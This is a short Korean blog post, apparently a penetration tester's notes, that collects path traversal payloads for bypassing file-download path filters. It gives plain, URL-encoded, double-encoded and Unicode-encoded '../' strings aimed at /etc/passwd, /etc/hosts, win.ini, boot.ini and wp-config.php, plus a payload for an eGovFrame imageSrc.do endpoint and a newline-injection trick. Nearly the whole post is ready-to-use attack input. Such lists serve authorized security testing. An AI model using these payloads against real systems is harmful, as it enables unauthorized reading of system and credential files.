* 파일 다운로드 경로 우회
1) 파일 다운로드 경로
../../../../etc/passwd
../../../../etc/hosts
../../../../winnt/win.ini
../../../../boot.ini
../../../../wp-config.php
2) 인코딩
../../../../etc/passwd
%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
../../../../../../../../../etc/hosts
인코딩 %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%68%6f%73%74%73
더블 인코딩 %252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2fetc%2fhosts
3) 전자정부 표준프레임워크 사용
imageSrc.do?path=/....//....//....//....//....//....//....//....//....//....//etc/&physical=passwd
4) 그 외
passwd %70%61%73%73%77%64
16bit 유니코드인코딩 .(%u002e), /(%u2215), \(%u2216)
더블URL 인코딩 .(%252e), /(%252f), \(%255c)
유닉스 ../../../../etc/passwd%0a.jpg > 개행문자(%0a)를 삽입 가능
https://itinformation.tistory.com/46
'웹' 카테고리의 다른 글
apache tomcat tree (0) | 2021.11.08 |
---|---|
overflow error based 확인 (0) | 2021.10.27 |
그누보드 cheditor 건 (0) | 2021.10.12 |
cross editor default password (0) | 2021.10.10 |
graphql 모의해킹 수행 (진행 중) (2) | 2021.09.08 |